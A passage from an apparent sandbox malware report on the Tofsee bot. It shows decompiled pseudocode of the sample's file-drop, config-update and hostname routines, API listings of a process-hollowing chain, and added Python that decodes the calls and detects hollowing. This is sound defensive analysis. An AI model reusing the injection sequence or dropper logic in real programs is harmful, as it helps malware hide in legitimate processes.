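• CreateProcessA.KERNEL32(00000000,00129947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,001322F8), ref: 001297B1
• GetThreadContext.KERNEL32(?,?,?,?,?,?,?,001322F8), ref: 001297EB
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,001322F8), ref: 001297F9
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,001322F8), ref: 00129831
• SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,001322F8), ref: 0012984E
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,001322F8), ref: 0012985B
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00126BA7
"""

# Bit tables for the arguments that matter here (values from the Windows SDK headers).
CREATION_FLAGS = {0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
                  0x00000010: "CREATE_NEW_CONSOLE", 0x08000000: "CREATE_NO_WINDOW"}
CONTEXT_FLAGS = {0x00010000: "CONTEXT_i386", 0x00000001: "CONTEXT_CONTROL",
                 0x00000002: "CONTEXT_INTEGER", 0x00000004: "CONTEXT_SEGMENTS",
                 0x00000008: "CONTEXT_FLOATING_POINT", 0x00000010: "CONTEXT_DEBUG_REGISTERS"}
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x04: "FILE_ATTRIBUTE_SYSTEM",
              0x80: "FILE_ATTRIBUTE_NORMAL"}


def parse_api_lines(text):
    """Turn report 'APIs' lines into dicts; '?' (unresolved stack slot) becomes None."""
    calls = []
    for m in API_LINE.finditer(text):
        api, module, raw_args, ref = m.groups()
        args = [None if a.strip() == "?" else int(a, 16)
                for a in raw_args.split(",") if a.strip()]
        calls.append({"api": api, "module": module, "args": args, "ref": int(ref, 16)})
    return calls


def decode_flags(value, table):
    """Name every known bit in value; leftover bits are reported as hex."""
    names, known = [], 0
    for bit, name in table.items():
        if value & bit == bit:
            names.append(name)
            known |= bit
    if value & ~known:
        names.append(f"0x{value & ~known:x}")
    return names


def _arg(call, index):
    args = call["args"]
    return args[index] if index < len(args) else None


def decode_call(call):
    """Decode the arguments relevant to the injection / file-drop pattern."""
    api, out = call["api"], {}
    if api == "CreateProcessA" and _arg(call, 5) is not None:
        out["dwCreationFlags"] = decode_flags(_arg(call, 5), CREATION_FLAGS)
    elif api == "SetThreadContext" and _arg(call, 1) is not None:
        # The report shows 00010002 in the second slot; read as CONTEXT.ContextFlags it
        # selects the integer registers, which is what an entry-point patch needs.
        out["ContextFlags"] = decode_flags(_arg(call, 1), CONTEXT_FLAGS)
    elif api == "WriteProcessMemory" and _arg(call, 3) is not None:
        out["nSize"] = _arg(call, 3)          # 4 bytes: a single pointer-sized patch
    elif api == "CreateFileA":
        if _arg(call, 1) is not None:
            out["dwDesiredAccess"] = decode_flags(_arg(call, 1), ACCESS_FLAGS)
        if _arg(call, 4) is not None:
            out["dwCreationDisposition"] = DISPOSITIONS.get(_arg(call, 4), hex(_arg(call, 4)))
        if _arg(call, 5) is not None:
            out["dwFlagsAndAttributes"] = decode_flags(_arg(call, 5), FILE_ATTRS)
    return out


# Order of the calls by code address in the listing; TerminateProcess sits between
# GetThreadContext and WriteProcessMemory as the failure branch, so it is not required.
HOLLOWING_CHAIN = ["CreateProcessA", "GetThreadContext", "WriteProcessMemory",
                   "SetThreadContext", "ResumeThread"]


def detect_hollowing(calls):
    """Report whether the listing contains the suspended-create -> patch -> resume chain."""
    first = {}
    for c in calls:
        first.setdefault(c["api"], c)
    missing = [n for n in HOLLOWING_CHAIN if n not in first]
    cp = first.get("CreateProcessA")
    suspended = bool(cp and _arg(cp, 5) is not None and _arg(cp, 5) & 0x4)
    in_order = not missing and all(first[a]["ref"] < first[b]["ref"]
                                   for a, b in zip(HOLLOWING_CHAIN, HOLLOWING_CHAIN[1:]))
    verdict = ("process hollowing (RunPE) pattern" if suspended and in_order
               else "incomplete chain")
    return {"suspended_create": suspended, "missing": missing,
            "in_order": in_order, "verdict": verdict}


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_APIS):
        print(f"{c['api']:<20} @0x{c['ref']:08x} {decode_call(c)}")
    print(detect_hollowing(parse_api_lines(SAMPLE_APIS)))
```

The ordering check uses the ref (code address) column, which is the only sequencing information these static listings carry; on a dynamic API trace you would order by timestamp and additionally require that the handle passed to WriteProcessMemory and ResumeThread is the one returned by CreateProcessA.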

                                                                                C-Code - Quality: 98%
                                                                                			E0012E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
                                                                                				CHAR* _v8;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v16;
                                                                                				CHAR* _v20;
                                                                                				intOrPtr _v24;
                                                                                				CHAR* _v28;
                                                                                				CHAR* _v32;
                                                                                				intOrPtr _v36;
                                                                                				char _v37;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr _t95;
                                                                                				int _t126;
                                                                                				void* _t136;
                                                                                				void* _t138;
                                                                                				CHAR* _t139;
                                                                                				void* _t146;
                                                                                				char _t150;
                                                                                				void* _t154;
                                                                                				void* _t158;
                                                                                				void* _t159;
                                                                                
                                                                                				_t146 = __edx;
                                                                                				_v20 = 0;
                                                                                				E0012DD05();
                                                                                				_t150 = _a4;
                                                                                				_t158 = E0012DD84(_t150, _a8);
                                                                                				_pop(_t138);
                                                                                				if(_t158 != 0) {
                                                                                					L2:
                                                                                 					_t16 = _t158 + 0x30; // 0x30
                                                                                 					// Locate key _a12 inside the record payload (data at +0x30, length at +0x24); 0 if absent.
                                                                                 					_v8 = E00122419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
                                                                                 					_t21 = lstrlenA(_a12) + 1; // 0x1
                                                                                 					_t136 = _t21; // strlen(key) + NUL
                                                                                 					_t87 = lstrlenA(_a16) + _t136 + 1; // total size of the new "key\0value\0" entry
                                                                                 					_v16 = _t87;
                                                                                					if(_v8 == 0) {
                                                                                						_t139 =  *((intOrPtr*)(_t158 + 0x24));
                                                                                						_v12 = _v12 & 0x00000000;
                                                                                						_v8 = _t139;
                                                                                						_t152 = _t139;
                                                                                					} else {
                                                                                						_t126 = lstrlenA(_v8);
                                                                                						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                						_v12 = _t126 + _t136 + 1;
                                                                                						_t87 = _v16;
                                                                                						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                					}
                                                                                 					if(_v12 == _t87) { // same length as the existing entry: overwrite in place
                                                                                 						E0012EE08(_t152 + _t158 + 0x30, _a12, _t136);
                                                                                 						E0012EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
                                                                                 						_t77 = _t158 + 0x30; // 0x30
                                                                                 						_t95 = E001224C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
                                                                                 						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) { // E001224C2 recomputed over the payload: store it and set the modified flag if it changed
                                                                                 							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
                                                                                 							 *0x1336c0 = 1;
                                                                                 						}
                                                                                 					} else {
                                                                                 						// Length differs (or the key is new): allocate a record of the new size and rebuild it.
                                                                                 						_t41 = _t87 + 0x24; // 0x24
                                                                                 						_t154 = E0012EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
                                                                                						if(_t154 != 0) {
                                                                                							_t43 = _t158 + 0xc; // 0xc
                                                                                							E0012EE08(_t154, _t43,  &(_v8[0x24]));
                                                                                							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
                                                                                							_v20 =  &(_v8[_t154]);
                                                                                							E0012EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
                                                                                							E0012EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
                                                                                							E0012EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
                                                                                							_t66 = _t154 + 0x24; // 0x24
                                                                                							 *((intOrPtr*)(_t154 + 0x14)) = E001224C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
                                                                                							E0012DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
                                                                                							E0012EC2E(_t154);
                                                                                							_v20 = 1;
                                                                                						}
                                                                                					}
                                                                                 					L10:
                                                                                 					E0012DD69();
                                                                                 					return _v20; // 1 only when the record was rebuilt at a new size
                                                                                				}
                                                                                 				// Record not found: build an empty one (name truncated to 0x10 bytes by lstrcpynA),
                                                                                 				// register it through E0012DF4C, then retry the lookup.
                                                                                 				_v56 = _t150;
                                                                                 				_v28 = 0;
                                                                                 				_v24 = 3;
                                                                                 				lstrcpynA( &_v52, _a8, 0x10);
                                                                                 				_v37 = 0;
                                                                                 				_v32 = 0;
                                                                                 				_v36 = E001224C2( &_v20, 0, 0);
                                                                                 				E0012DF4C(_t146,  &_v56);
                                                                                 				_t158 = E0012DD84(_t150, _a8);
                                                                                				_t159 = _t159 + 0x18;
                                                                                				if(_t158 == 0) {
                                                                                					goto L10;
                                                                                				}
                                                                                				goto L2;
                                                                                 			}

                                                                                 Instruction addresses for the listing above (the report's per-line address column, flattened here): 0x0012e8a1 to 0x0012ea83.

                                                                                APIs
                                                                                  • Part of subcall function 0012DD05: GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                  • Part of subcall function 0012DD05: InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                  • Part of subcall function 0012DD05: GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                  • Part of subcall function 0012DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0012DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0012E3A7,000000F0), ref: 0012DDB5
                                                                                • lstrcpynA.KERNEL32(?,00121E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0012EAAA,?,?), ref: 0012E8DE
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0012EAAA,?,?,00000001,?,00121E84,?), ref: 0012E935
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0012EAAA,?,?,00000001,?,00121E84,?,0000000A), ref: 0012E93D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0012EAAA,?,?,00000001,?,00121E84,?), ref: 0012E94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                • String ID: flags_upd$localcfg
                                                                                • API String ID: 204374128-3505511081
                                                                                • Opcode ID: d0ca5a2e57bb972bf0ecfc980e7902e68419d1ba45eccb8a4cfc0f0283024942
                                                                                • Instruction ID: ad368cbf21836c29b665a8964e7c8cfbed8d80b95ab5080b9d8fc5f098ad3fb0
                                                                                • Opcode Fuzzy Hash: d0ca5a2e57bb972bf0ecfc980e7902e68419d1ba45eccb8a4cfc0f0283024942
                                                                                • Instruction Fuzzy Hash: 96515E7290021AAFCF01EFE8D985DAEBBF9FF58304F14052AF415A3211D774EA658B50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
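What E0012E8A1 does, read from the listing: look up the record named _a8 of type _a4 (creating an empty one if it is missing), find the entry for key _a12 inside its payload, and either overwrite it in place when the new key/value pair has the same length as the old one, or rebuild the record at the new size. The string references "localcfg" and "flags_upd" show the caller updating the flags_upd entry of the local configuration. The following Python is an added model of that logic, not the sample's code and not from the report; the "key\0value\0" entry encoding (inferred from the lstrlenA arithmetic), the 15-character name limit implied by lstrcpynA(..., 0x10), and CRC32 as a stand-in for E001224C2 (not identified on this page) are assumptions.

```python
"""Model of the config-entry update performed by E0012E8A1, as read from the
decompilation.  Added example, not Tofsee's code and not from the report.
Assumed: the 'key\\0value\\0' entry encoding, the 15-character name limit from
lstrcpynA(.., 0x10), and CRC32 standing in for the unidentified E001224C2."""
import zlib
from dataclasses import dataclass


@dataclass
class ConfigRecord:
    kind: int               # the 'char _a4' record type
    name: str               # lstrcpynA(.., 0x10): at most 15 characters survive
    data: bytes = b""       # payload: consecutive key\0value\0 entries (assumed encoding)
    checksum: int = 0       # value kept at record+0x20 in the listing
    dirty: bool = False     # models the global at 0x1336c0, set when the checksum changes


def _checksum(data):
    """Stand-in for E001224C2 (assumption: CRC32)."""
    return zlib.crc32(data) & 0xFFFFFFFF


def _entries(data):
    """Yield (offset, key, value, entry_length) for each key\\0value\\0 pair."""
    off = 0
    while off < len(data):
        k_end = data.find(b"\0", off)
        v_end = data.find(b"\0", k_end + 1) if k_end >= 0 else -1
        if v_end < 0:
            return                        # truncated entry: stop rather than read past it
        yield (off, data[off:k_end].decode("latin-1"),
               data[k_end + 1:v_end].decode("latin-1"), v_end + 1 - off)
        off = v_end + 1


class ConfigStore:
    def __init__(self):
        self.records = {}                 # (kind, name) -> ConfigRecord

    def find(self, kind, name):
        return self.records.get((kind, name[:15]))

    def get_value(self, kind, name, key):
        rec = self.find(kind, name)
        if rec is None:
            return None
        for _off, k, v, _len in _entries(rec.data):
            if k == key:
                return v
        return None

    def set_value(self, kind, name, key, value):
        """Store key=value; returns True only when the record had to be rebuilt
        (the listing returns _v20 == 1 only on that path)."""
        rec = self.find(kind, name)
        if rec is None:
            # No such record: create an empty one first, as the listing does
            # before retrying the E0012DD84 lookup.
            rec = ConfigRecord(kind, name[:15], b"", _checksum(b""))
            self.records[(kind, rec.name)] = rec
        entry = key.encode("latin-1") + b"\0" + value.encode("latin-1") + b"\0"
        off, old_len = len(rec.data), 0   # default: append at the end (_v12 = 0)
        for e_off, k, _v, e_len in _entries(rec.data):
            if k == key:
                off, old_len = e_off, e_len
                break
        if old_len == len(entry):
            # Same size as the existing entry: overwrite in place, recompute the
            # checksum and flag the store dirty only if it changed.
            rec.data = rec.data[:off] + entry + rec.data[off + old_len:]
            new_sum = _checksum(rec.data)
            if new_sum != rec.checksum:
                rec.checksum, rec.dirty = new_sum, True
            return False
        # Size differs (or the key is new): build a replacement record of the new
        # length.  In the listing E0012DF4C swaps it in; whatever it does with the
        # dirty flag is not visible on this page, so it is not modelled here.
        rec.data = rec.data[:off] + entry + rec.data[off + old_len:]
        rec.checksum = _checksum(rec.data)
        return True


if __name__ == "__main__":
    store = ConfigStore()
    print(store.set_value(1, "localcfg", "flags_upd", "1"))   # True: record created and sized
    print(store.set_value(1, "localcfg", "flags_upd", "2"))   # False: same length, in place
    print(store.find(1, "localcfg"))
```

The in-place path is the one worth watching when hunting the bot's state on disk: a value change that keeps the entry length leaves the record size untouched and only the checksum at +0x20 and the modified flag move, so a differ that keys on record length alone will miss it.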

                                                                                C-Code - Quality: 43%
                                                                                 			E00126BA7(CHAR* _a4) {
                                                                                 				long _v8;
                                                                                 				long _v12;
                                                                                 				long _t14;
                                                                                 				int _t19;
                                                                                 				void* _t28;
                                                                                 				void* _t39;
                                                                                 
                                                                                 				_push(_t30);
                                                                                 				// *0x1330ac holds a function pointer resolved elsewhere; IsBadCodePtr guards the call.
                                                                                 				if(IsBadCodePtr( *0x1330ac) == 0) {
                                                                                 					// First call with a NULL buffer: the callee reports the required size in _v8.
                                                                                 					_push( &_v8);
                                                                                 					_push(0);
                                                                                 					if( *0x1330ac() == 0) {
                                                                                 						_t28 = E0012EBCC(_v8); // appears to allocate _v8 bytes (E0012EC2E is the matching release)
                                                                                 						if(_t28 == 0) {
                                                                                 							L7:
                                                                                 							_t14 = 0;
                                                                                 						} else {
                                                                                 							// Second call fills the buffer.
                                                                                 							_push( &_v8);
                                                                                 							_push(_t28);
                                                                                 							if( *0x1330ac() == 0) {
                                                                                 								_v12 = 0;
                                                                                 								// GENERIC_WRITE (0x40000000), no sharing, CREATE_ALWAYS (2), FILE_ATTRIBUTE_NORMAL (0x80)
                                                                                 								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                 								if(_t39 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                                 									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
                                                                                 									_push(_t39);
                                                                                 									if(_t19 != 0) {
                                                                                 										CloseHandle();
                                                                                 										E0012EC2E(_t28);
                                                                                 										_t14 = _v8; // success: returns the buffer size, not the byte count WriteFile put in _v12
                                                                                 									} else {
                                                                                 										// Failed write: remove the file so no truncated copy is left behind.
                                                                                 										CloseHandle();
                                                                                 										DeleteFileA(_a4);
                                                                                 										goto L9;
                                                                                 									}
                                                                                 								} else {
                                                                                 									L9:
                                                                                 									E0012EC2E(_t28);
                                                                                 									_t14 = 0;
                                                                                 								}
                                                                                 							} else {
                                                                                 								E0012EC2E(_t28);
                                                                                 								goto L7;
                                                                                 							}
                                                                                 						}
                                                                                 					} else {
                                                                                 						_t14 = 0;
                                                                                 					}
                                                                                 					return _t14;
                                                                                 				} else {
                                                                                 					return 0;
                                                                                 				}
                                                                                			}


                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: d93507569a4e509853638147d78581b2d217b23be0402050fa428389ddddfa53
                                                                                • Instruction ID: 80442b52be97dd18010139ad7785c81ad323f68abf62d0211f56e30081cb97a9
                                                                                • Opcode Fuzzy Hash: d93507569a4e509853638147d78581b2d217b23be0402050fa428389ddddfa53
                                                                                • Instruction Fuzzy Hash: 2F219072204125FFDB19ABB0FD89E9F7BACDB497A0B204515F542E1090EB31DE60D674
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 63%
                                                                                			E00129064(void* __eflags, void* _a4, CHAR* _a8) {
                                                                                				long _v8;
                                                                                				char _v1032;
                                                                                				signed int _t29;
                                                                                				signed int _t62;
                                                                                				void* _t64;
                                                                                
                                                                                				GetTempPathA(0x400,  &_v1032);
                                                                                				E00128274( &_v1032);
                                                                                				_t29 = E0012ECA5();
                                                                                				_t62 = 9;
                                                                                				_push(_t29 % _t62);
                                                                                				_push(E0012ECA5() % _t62);
                                                                                				_push(E0012ECA5() % _t62);
                                                                                				_push(E0012ECA5() % _t62);
                                                                                				_push( &_v1032);
                                                                                				wsprintfA(_a8, E00122544(0x1322f8,  &E00130794, 0xf, 0xe4, 0xc8));
                                                                                				E0012EE2A(_t62, 0x1322f8, 0, 0x100);
                                                                                				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
                                                                                				if(_t64 <= 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
                                                                                				CloseHandle(_t64);
                                                                                				return 1;
                                                                                			}


                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?,00000000,001322F8), ref: 0012907B
                                                                                • wsprintfA.USER32 ref: 001290E9
                                                                                • CreateFileA.KERNEL32(001322F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0012910E
                                                                                • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00129122
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0012912D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00129134
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2439722600-0
                                                                                • Opcode ID: 36c14b4f63e684f7d72ed56264c37a6e5123ebf96dfafc5c13d55dcb8c26cb91
                                                                                • Instruction ID: 4549582a07ae5b9fbebe9a43813e18076d09f6852bb1cdbb03f2b51055a31baa
                                                                                • Opcode Fuzzy Hash: 36c14b4f63e684f7d72ed56264c37a6e5123ebf96dfafc5c13d55dcb8c26cb91
                                                                                • Instruction Fuzzy Hash: 49119AB26401247BF7257B76EC0AFAF36BDDBD8B00F008065FB0AA5151EB704E619660
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0012DD05() {
                                                                                				long _t4;
                                                                                				long _t10;
                                                                                
                                                                                				_t10 = GetTickCount();
                                                                                				while(InterlockedExchange(0x1336b4, 1) != 0) {
                                                                                					if(GetCurrentThreadId() !=  *0x1336b8) {
                                                                                						if(GetTickCount() - _t10 >= 0x2710) {
                                                                                							 *0x1336bc =  *0x1336bc & 0x00000000;
                                                                                						} else {
                                                                                							Sleep(0);
                                                                                							continue;
                                                                                						}
                                                                                					}
                                                                                					L7:
                                                                                					_t4 = GetCurrentThreadId();
                                                                                					 *0x1336bc =  *0x1336bc + 1;
                                                                                					 *0x1336b8 = _t4;
                                                                                					return _t4;
                                                                                				}
                                                                                				goto L7;
                                                                                			}


                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0012DD20
                                                                                • GetTickCount.KERNEL32 ref: 0012DD2E
                                                                                • Sleep.KERNEL32(00000000,?,74CB43E0,?,00000000,0012E538,?,74CB43E0,?,00000000,?,0012A445), ref: 0012DD3B
                                                                                • InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 3819781495-0
                                                                                • Opcode ID: 48bc5fd5470b3f7eb460961f892cd75bb11d65220703a5dbfe3a9616ae905392
                                                                                • Instruction ID: 6044be36c92ad11f718f126d700e5fc3097e0878452329d96a309219ffee1f94
                                                                                • Opcode Fuzzy Hash: 48bc5fd5470b3f7eb460961f892cd75bb11d65220703a5dbfe3a9616ae905392
                                                                                • Instruction Fuzzy Hash: 4CF0E2B2104618AFD7895FA6FDC9B393BE4E748392F100015F109C2AA1C72096D58F26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0012AD08(CHAR* _a4) {
                                                                                				char _v132;
                                                                                				int _t9;
                                                                                				char _t11;
                                                                                				intOrPtr* _t12;
                                                                                				CHAR* _t13;
                                                                                				CHAR* _t14;
                                                                                
                                                                                				_t9 = gethostname( &_v132, 0x80);
                                                                                				if(_t9 != 0) {
                                                                                					_t14 = _a4;
                                                                                					L15:
                                                                                					if( *_t14 != 0) {
                                                                                						return _t9;
                                                                                					}
                                                                                					return lstrcpyA(_t14, "LocalHost");
                                                                                				}
                                                                                				_t13 = _a4;
                                                                                				_t11 = _v132;
                                                                                				_t12 =  &_v132;
                                                                                				_t14 = _t13;
                                                                                				while(_t11 != 0) {
                                                                                					if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                						if(_t11 < 0x41 || _t11 > 0x5a) {
                                                                                							if(_t11 < 0x30 || _t11 > 0x39) {
                                                                                								if(_t11 != 0x2e) {
                                                                                									goto L10;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L9;
                                                                                					} else {
                                                                                						L9:
                                                                                						 *_t13 = _t11;
                                                                                						_t13 =  &(_t13[1]);
                                                                                						L10:
                                                                                						_t12 = _t12 + 1;
                                                                                						_t11 =  *_t12;
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				_t9 = lstrlenA(_t14);
                                                                                				if(_t14[_t9] == 0x2e) {
                                                                                					_t9 = lstrlenA(_t14);
                                                                                					_t14[_t9] = 0;
                                                                                				}
                                                                                				goto L15;
                                                                                			}


                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 0012AD1C
                                                                                • lstrlenA.KERNEL32(?), ref: 0012AD60
                                                                                • lstrlenA.KERNEL32(?), ref: 0012AD69
                                                                                • lstrcpyA.KERNEL32(?,LocalHost), ref: 0012AD7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$gethostnamelstrcpy
                                                                                • String ID: LocalHost
                                                                                • API String ID: 3695455745-3154191806
                                                                                • Opcode ID: 51521f5ea3614d5eeb951c34328fb8b1f1c243a5ac6b5b16ccaafe1c97d415d2
                                                                                • Instruction ID: efbe122ef45dd65c6226042dfd508b27968c9a84c8e818f3d0724aba1ff114da
                                                                                • Opcode Fuzzy Hash: 51521f5ea3614d5eeb951c34328fb8b1f1c243a5ac6b5b16ccaafe1c97d415d2
                                                                                • Instruction Fuzzy Hash: 930189248441ED5FDF3A06A8B844BE43F659F96706FD00056E0C0C7915D71488978753
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00124280(void* __ecx, intOrPtr _a4) {
                                                                                				void* _v8;
                                                                                				unsigned int _v12;
                                                                                				unsigned int _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				signed int _t35;
                                                                                				signed int _t38;
                                                                                				signed int _t40;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t73;
                                                                                				intOrPtr* _t74;
                                                                                
                                                                                				_t68 = __ecx;
                                                                                				_t35 = CreateEventA(0, 1, 1, 0);
                                                                                				_v8 = _t35;
                                                                                				if(_t35 != 0) {
                                                                                					_t38 = E00124000(E00123ECD(_t68),  &_v20);
                                                                                					if(_t38 == 0) {
                                                                                						L11:
                                                                                						_t40 = CloseHandle(_v8) | 0xffffffff;
                                                                                						L12:
                                                                                						return _t40;
                                                                                					}
                                                                                					_t67 = _v20;
                                                                                					_t40 = _t38 | 0xffffffff;
                                                                                					if(_t67 == _t40) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v16 = E0012ECA5();
                                                                                					E00123F18(_t67,  &_v16, 4, _v8, 0x7d0);
                                                                                					if(E00123F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
                                                                                						CloseHandle(_t67);
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_v12 = _v12 + (_v12 >> 2);
                                                                                						E00123F18(_t67,  &_v12, 4, _v8, 0x7d0);
                                                                                						_v28 = 1;
                                                                                						_t73 = 0xc;
                                                                                						_v24 = 1;
                                                                                						E00123F18(_t67,  &_v28, 8, _v8, 0x7d0);
                                                                                						_t74 = E0012EBCC(_t73);
                                                                                						 *_t74 = 0x61;
                                                                                						 *((intOrPtr*)(_t74 + 4)) = 2;
                                                                                						if(_a4 != 0) {
                                                                                							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
                                                                                							 *0x13215a =  *0x13215a + 1;
                                                                                						} else {
                                                                                							 *(_t74 + 8) = 1;
                                                                                						}
                                                                                						E00123F18(_t67, _t74, _v24, _v8, 0x7d0);
                                                                                						E0012EC2E(_t74);
                                                                                						E00123F8C(_t67,  &_v12, 4, _v8, 0x7d0);
                                                                                						CloseHandle(_v8);
                                                                                						CloseHandle(_t67);
                                                                                						_t40 = 0 | _a4 == 0x00000000;
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				return _t35 | 0xffffffff;
                                                                                			}

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,001298FD,00000001,00000100,001322F8,0012A3C7), ref: 00124290
                                                                                • CloseHandle.KERNEL32(0012A3C7), ref: 001243AB
                                                                                • CloseHandle.KERNEL32(00000001), ref: 001243AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateEvent
                                                                                • String ID:
                                                                                • API String ID: 1371578007-0
                                                                                • Opcode ID: dba0b5043320315b9d059805a29d7b1a37645cc8b7a7487a6f265f1628e184d8
